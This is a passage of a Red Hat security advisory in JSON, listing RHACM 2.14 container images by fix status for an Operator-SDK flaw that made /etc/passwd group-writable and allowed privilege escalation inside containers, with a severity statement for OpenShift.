"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2376300"
}
],
"notes": [
{
"category": "description",
"text": "Early versions of Operator-SDK provided an insecure method to allow operator containers to run in environments that used a random UID. Operator-SDK before 0.15.2 provided a script, user_setup, which modifies the permissions of the /etc/passwd file to 664 during build time. Developers who used Operator-SDK before 0.15.2 to scaffold their operator may still be impacted by this if the insecure user_setup script is still being used to build new container images. \n\nIn affected images, the /etc/passwd file is created during build time with group-writable permissions and a group ownership of root (gid=0). An attacker who can execute commands within an affected container, even as a non-root user, may be able to leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "operator-sdk: privilege escalation due to incorrect permissions of /etc/passwd",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Product Security has rated this vulnerability as low severity for affected products which run on OpenShift. The vulnerability allows for potential privilege escalation within a container, but OpenShift\u0027s default, multi-layered security posture effectively mitigates this risk. \n\nThe primary controls include the default Security Context Constraints (SCC), which severely limit a container\u0027s permissions from the start, and SELinux, which enforces mandatory access control to ensure strict isolation. While other container runtime environments may have different controls available and require case-by-case analysis, OpenShift\u0027s built-in defenses are designed to prevent this type of attack.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
